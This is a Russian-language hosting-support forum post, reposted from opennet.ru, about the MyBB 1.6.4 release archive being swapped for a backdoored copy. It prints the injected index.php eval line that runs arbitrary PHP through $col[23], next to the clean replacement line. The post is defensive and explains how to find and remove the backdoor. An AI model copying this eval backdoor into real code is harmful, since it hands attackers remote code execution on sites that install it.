Автор Тема: В поставке открытого форума MyBB обнаружен вредоносный код  (Прочитано 6346 раз)

Оффлайн support

  • Администратор
  • Ветеран
  • *****
  • Сообщений: 1304
В начале октября разработчики открытого форума MyBB опубликовали уведомление о наличии критической уязвимости в последней версии MyBB 1.6.4, выпущенной три месяца назад. Сегодня опубликованы подробности, указывающие на то, что уязвимость, позволяющая выполнить произвольный код PHP, была внесена злоумышленниками путем подмены архива с релизом форума на сервере загрузки.

По словам разработчиков злоумышленники проникли в систему через неизвестную уязвимость в движке сайта, разработанном своими силами, но основанном на использовании сторонних открытых фреймворков. Разработчики считают, что проблема безопасности присутствует не в коде их CMS, который не распространяется публично, а в используемых внешних фреймворках. Подробности совершения взлома и время подмены архива неизвестны, поэтому разработчики рекомендуют срочно установить обновление для всех пользователей MyBB 1.6.4, загрузивших архив до 6 октября. Пользователям рекомендуется проверить файл index.php на наличие вредоносного кода и удалить директорию "install".

Уязвимы системы в файле index.php которых содержится строка:

   eval("\$loginform = \"".$templates->get("index_loginform")."\";".@$col[23]);


для блокирования вредоносного кода, данную строку следует заменить на:

   eval("\$loginform = \"".$templates->get("index_loginform")."\";");

С целью предотвращения подобных инцидентов в будущем, разработчики MyBB намерены начать распространение контрольных сумм для проверки целостности изначально опубликованных архивов. Контрольные суммы планируется распространять через сторонний сервер, чтобы исключить ситуацию, при которой злоумышленники могут подменить файлы с контрольными суммами. Второй вариант, который рассматривают разработчики MyBB - использование для организации загрузки релизов сетей доставки контента (CDN).


//opennet.ru
Какой вопрос - такой ответ.
Хостинг-провайдер HOST96.ru
Служба технической поддержки